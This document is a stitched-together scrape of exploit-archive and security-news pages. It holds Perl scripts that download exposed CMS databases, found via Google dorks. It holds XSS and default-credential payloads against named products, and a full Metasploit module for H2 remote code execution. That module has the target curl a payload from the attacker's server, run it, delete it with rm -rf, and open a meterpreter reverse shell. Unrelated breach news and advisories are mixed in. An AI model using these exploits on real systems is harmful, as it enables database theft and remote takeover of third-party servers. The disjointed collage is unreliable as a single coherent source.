ExcessWeb and Network CMS version 4.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : ExcessWeb & Network CMS v4.0 Database Disclosure Vulnerability                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               |  
| # Vendor    : http://www.excessweb.co.th/                                                                                        |    
| # Dork      : Powered by ExcessWeb & Network                                                                                     |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# ExcessWeb & Network CMS v4.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('ExcessWeb & Network CMS v4.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/Webdatas.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

ExcessWeb And Network CMS 4.0 Database Disclosure

Evsanati Radyo version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : evsanati radyo v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti/                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] appears to leave default credentials installed after installation.[+] Use Payload : user & pass = admin [+] panel = yonetim[+] http://127.0.0.1/wwwkacikfmcom/yonetim/home.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Evsanati Radyo 1.0 Insecure Settings

Event Locations CMS version 1.0.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS v1.0.1 - XSS Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] click 2 creat a Nouveau RDV & use payload : <script>alert(/indoushka/);</script>[+] http://127.0.0.1/cutgg/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Event Locations CMS 1.0.1 Cross Site Scripting

Erim Upload version 4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Erim Upload V4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://script.horje.com/view/218412                                                                               |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (upload/veritabani/erimicel.mdb ) file  
    The (upload/veritabani/erimicel.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# Erim Upload V4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : script.horje.com/view/218412

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('Erim Upload V4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="upload/veritabani/erimicel.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/erimicel.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/erimicel.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Erim Upload 4 Database Disclosure

E-partenaire LMS version 1.0.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : E-partenaire LMS v1.0.0 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://agence-web-aix-en-provence.fr/                                                                              |  | # Dork      : "Conception : e-partenaire" inurl:.php?id=                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /actualites.php?id=16%27%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3E[+] https://127.0.0.1/ambiancepackcom/fr/actualites.php?id=16%27%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

E-partenaire LMS 1.0.0 Cross Site Scripting

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

**EMH CMS 0.1 Cross Site Scripting**

Posted Aug 16, 2023

Authored by indoushka

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | c58615aff6cd57a5ca22a34be62372e9e81249eb20b812f9a35ccd440af33052

Download | Favorite | View

**EMH CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : EMH CMS v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(64-bit)                                             | | # Vendor    : http://www.theemhglobal.com/                                                                                       |  | # Dork      : Designed by EMH TheEmhGlobal                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/freedomcentreinternationalorg/icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,973)
*   Arbitrary (16,202)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,280)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,437)
*   Encryption (2,370)
*   Exploit (51,900)
*   File Inclusion (4,222)
*   File Upload (974)
*   Firewall (821)
*   Info Disclosure (2,775)
*   Intrusion Detection (892)
*   Java (3,044)
*   JavaScript (859)
*   Kernel (6,674)
*   Local (14,453)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,777)
*   Root (3,584)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,373)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,778)
*   Web (9,668)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,944)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,470)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,734)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,822)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,573)
*   Other

EMH CMS 0.1 Cross Site Scripting

The H2 database contains an alias function which allows for arbitrary Java code to be used. This functionality can be abused to create an exec functionality to pull our payload down and execute it. H2's web interface contains restricts MANY characters, so injecting a payload directly is not favorable. A valid database connection is required. If the database engine was configured to allow creation of databases, the module default can be used which utilizes an in memory database. Some Docker instances of H2 don't allow writing to folders such as /tmp, so we default to writing to the working directory of the software. This Metasploit module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'H2 Web Interface Create Alias RCE',        'Description' => %q{          The H2 database contains an alias function which allows for arbitrary Java code to be used.          This functionality can be abused to create an exec functionality to pull our payload down          and execute it. H2's web interface contains restricts MANY characters, so injecting a payload          directly is not favorable. A valid database connection is required. If the database engine          was configured to allow creation of databases, the module default can be used which          utilizes an in memory database. Some Docker instances of H2 don't allow writing to          folders such as /tmp, so we default to writing to the working directory of the software.          This module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails)        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'gambler', # edb 44422          'h4ckNinja', # edb 45506          'Nairuz Abulhul' # medium write-up        ],        'References' => [          [ 'EDB', '44422'],          [ 'EDB', '45506'],          [ 'URL', 'https://medium.com/r3d-buck3t/chaining-h2-database-vulnerabilities-for-rce-9b535a9621a2'],          [ 'URL', 'https://www.h2database.com/html/commands.html#create_alias']        ],        'Stance' => Stance::Aggressive,        'Platform' => 'unix',        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Payload' => {          # likely more, these aren't really used now that we go with a curl          # to retrieve our payload, but leaving here for future travelers          'BadChars' => '"<>;|`\\'        },        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2018-04-09', # first EDB link, prob older since this seems to be a 'feature'        'DefaultTarget' => 0,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'NOCVE' => ['abusing a feature']        }      )    )    register_options(      [        Opt::RPORT(8082),        OptString.new('USERNAME', [ true, 'User to login with', '']),        OptString.new('PASSWORD', [ true, 'Password to login with', '']),        OptString.new('DATABASE', [ true, 'Database to use', 'jdbc:h2:mem:']),        OptString.new('TARGETURI', [ true, 'The URI of the H2 web interface', '/']),        OptBool.new('GETVERSION', [ true, 'Get the version of the database before exploiting', true])      ]    )  end  def get_jsessionid    vprint_status('Obtaining jsessionid (cookie equivalent)')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'login.jsp'),      'method' => 'GET'    )    return nil if res.nil?    return nil unless res.code == 200    if res.body =~ /location.href = 'login\.jsp\?jsessionid=([^']+)';/      vprint_good("jsessionid (cookie equivalent): #{Regexp.last_match(1)}")      return Regexp.last_match(1)    else      return nil    end  end  def login(check_only: false)    page = 'login.do'    if check_only      page = 'test.do'    end    send_request_cgi({      'uri' => normalize_uri(target_uri.path, page),      'method' => 'POST',      'vars_get' => {        'jsessionid' => @jsessionid      },      'vars_post' => {        'language' => 'en',        'setting' => 'Generic+H2+%28Server%29',        'name' => 'Generic+H2+%28Server%29',        'driver' => 'org.h2.Driver',        'url' => datastore['DATABASE'],        'user' => datastore['USERNAME'],        'password' => datastore['PASSWORD']      }    })  end  def check    @jsessionid = get_jsessionid    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'login.jsp'),      'method' => 'GET',      'vars_get' => {        'jsessionid' => @jsessionid      }    })    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    return CheckCode::Unknown("#{peer} - H2 web interface not found") unless res.body.include? '<title>H2 Console</title>'    print_status("Detected autofilled DB: #{Regexp.last_match(1)}") if res.body =~ /<td class="login"><input type="text" name="url" value="([^"]+)"/    print_status("Detected autofilled Username: #{Regexp.last_match(1)}") if res.body =~ /<td class="login"><input type="text" name="user" value="([^"]+)"/    res = login(check_only: true)    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    return CheckCode::Vulnerable("#{peer} - H2 web interface found, and database connection successful") if res.body.include? 'Test successful'    CheckCode::Safe("#{peer} - H2 web interface found, however database connection NOT successful")  end  def send_command(command)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'query.do'),      'method' => 'POST',      'vars_get' => {        'jsessionid' => @jsessionid      },      'vars_post' => {        'sql' => command      }    })    return nil if res.nil?    return nil if res.code != 200    res.body  end  def get_version    version = send_command('SELECT H2VERSION() FROM DUAL;')    # regex likely to break on version upgrades unfortunately    if version =~ %r{<table class="resultSet" cellspacing="0" cellpadding="0"><tr><th>H2VERSION</th></tr><tr><td>([^<]+)</td></tr></table>}      print_good("H2 Version detected: #{Regexp.last_match(1)}")      return    end    print_error('Unable to detect version')  end  def on_request_uri(cli, _request)    print_good('Received payload request')    send_response(cli, payload.encoded)  end  def exploit    @jsessionid ||= get_jsessionid    res = login    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    if datastore['GETVERSION']      get_version    end    start_service    alias_name = Rex::Text.rand_text_alpha_upper(6..12)    alias_function = %|CREATE ALIAS #{alias_name} AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;|    # escape single quotes with double single quotes, http://www.h2database.com/html/grammar.html    payload_name = "#{Rex::Text.rand_text_alphanumeric(6..10)}.sh"    vprint_status("Saving payload as #{payload_name}")    run_alias = "CALL #{alias_name}('curl #{get_uri} -o #{payload_name}');      CALL #{alias_name}('chmod a+x #{payload_name}');      CALL #{alias_name}('./#{payload_name} &');      CALL #{alias_name}('rm -rf #{payload_name}');"    delete_alias = "DROP ALIAS #{alias_name};"    print_status('Attempting to execute payload retrieval')    send_command("#{alias_function} #{run_alias} #{delete_alias}")  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  endend

H2 Web Interface Create Alias Remote Code Execution

Improper log permissions in SafeNet Authentication Service Version 3.4.0 on Windows allows an authenticated attacker to cause a denial of service via local privilege escalation.


 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2023-2737: Knowledge Article View - Thales Customer Support

Categories: News
Tags: Discord.io

Tags:  Discord

Tags:  data breach

Discord.io has confirmed that personally identifiable information of 760,000 members was stolen in a data breach. The third-party Discord service has been shut down for the time being



(Read more...)




The post Discord.io confirms theft of 760,000 members' data appeared first on Malwarebytes Labs.

Discord.io was/is a third party service that enables owners of Discord servers to create customized, personal Discord invites. After a preview of Discord.io's users database was posted on BreachForums, the owners have decided to shut down all Discord.io services "for the foreseeable future." Existing premium subscriptions have been canceled and discord.io promised to reach out as soon as possible on an individual basis.

_The site confirms that there has been a data breach_

The stolen information could include your discord.io username and your Discord ID, your email-address, your billing address, and a salted and hashed password if you signed up in 2018 or earlier. (In 2018 discord.io started to exclusively offer Discord as a login option.)

Payment details are said to be safe because those are stored safely by the payment partners, Stripe and PayPal. Discord.io has confirmed the authenticity of the breach, by an entity acting under the name Akhirah.

It is important to know that Discord is not affiliated with discord.io, a spokesperson from Discord told Stackdiary:

> “Discord is not affiliated with Discord.io. We do not share any user information with Discord.io directly and we do not have access to or control of information in Discord.io's custody.”

Discord has revoked the oauth authentication tokens for any Discord user that has used Discord.io, so that app can no longer perform actions on behalf of those users until they re-authenticate. Affected Discord users should change their passwords and enable multi-factor authentication (MFA).

To enable MFA on Discord:

*   Open the Discord desktop app or go to discord.com/login and enter your credentials to log in.
*   Go to the second vertical tab, and then click the gear icon beside the Mute and Deafen options to open user settings.
*   In the My Account tab, scroll down and click Enable Two-Factor Auth.
*   Enter your Discord password and open the authenticator app of your choice on your device.
*   Scan the QR code and enter the six-digit code to enable 2FA. You may want to write down the key and store it in a secure space, in case you should somehow lose access to your account.
*   Click Enable SMS Authentication to enable 2FA on Discord via SMS.

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor's advice. Every breach is different, so check with the vendor to find out what's happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don't use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Discord.io confirms theft of 760,000 members' data

Jenkins NodeJS Plugin integrates with Config File Provider Plugin to specify custom NPM settings, including credentials for authentication, in a Npm config file.

NodeJS Plugin 1.6.0 and earlier does not properly mask (i.e., replace with asterisks) credentials specified in the Npm config file in Pipeline build logs.

NodeJS Plugin 1.6.0.1 masks credentials specified in the Npm config file in Pipeline build logs.

**Package**

maven org.jenkins-ci.plugins:nodejs (Maven)

**Affected versions**

< 1.6.0.1

**Patched versions**

1.6.0.1

**Description**

Jenkins NodeJS Plugin integrates with Config File Provider Plugin to specify custom NPM settings, including credentials for authentication, in a Npm config file.

NodeJS Plugin 1.6.0 and earlier does not properly mask (i.e., replace with asterisks) credentials specified in the Npm config file in Pipeline build logs.

NodeJS Plugin 1.6.0.1 masks credentials specified in the Npm config file in Pipeline build logs.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2023-40340
*   https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3196

Published to the GitHub Advisory Database

Aug 16, 2023

Reviewed

Aug 16, 2023

Last updated

Aug 16, 2023

Tag

#auth